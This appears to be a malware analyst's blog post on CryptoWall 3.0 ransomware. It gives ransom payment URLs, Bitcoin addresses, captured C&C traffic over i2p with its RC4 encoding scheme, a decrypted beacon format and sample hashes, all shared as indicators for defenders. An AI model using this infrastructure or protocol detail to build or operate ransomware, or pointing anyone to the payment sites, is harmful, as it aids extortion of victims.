http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

The Decrypt 1 file for free is still here (yep...this option did not appear with CoinVault ;) )

Cryptowall Decrypt Service.

Bitcoin Address I saw (same infection vector) :
15qZLHkcgGnqaBByno2nq6ufa1og3PjnxU
1JYYzNHDaGC7noiE4eKatuYA4AThqVocDd

Uses those services to get external IP:

"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"

It seems communication with the C&C are Rc4 encoded (key seems to be alphanum sorted path of the POST ) and using i2p protocol :

Cryptowall 3.0 communications with C&C
(pcap by @Horgh_RCE)

--------------Slightly Edited-------
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p

v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
---------------Slightly Edited-------
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p

z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
--------------------------------------------------

Which decrypted is : (don't try with the previous data...some hexa were modified (letter changed) on purpose)

z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

But wait...if you are lucky (or not :) ) here is what you may see on the Decrypt service :

Error on the Decrypt Service. It seems this service chain Tor and i2p.
Service i2p :
http://decrypt-service.i2p/decrypt_service_ejakdanrmv8ka4jak2a5jfdn/vRRRbw

"Сайт I2P недоступен. Возможно, он отключен, сеть перегружена или ваш маршрутизатор недостаточно интегрирован с другими узлами. Вы можете повторить операцию."

Google says :

"I2P website is unavailable. Perhaps he is disabled, the network is congested or your router is not well integrated with other nodes. You can repeat the operation."

So...they are sadly back..and we can expect a lot of them in Exploit Kit, Spam, tasks in Botnet etc....

Files : Cryptowall_3.0.zip Contains : 6c3e6143ab699d6b78551d417c0a1a45 and 47363b94cee907e2b8926c1be61150c7

↧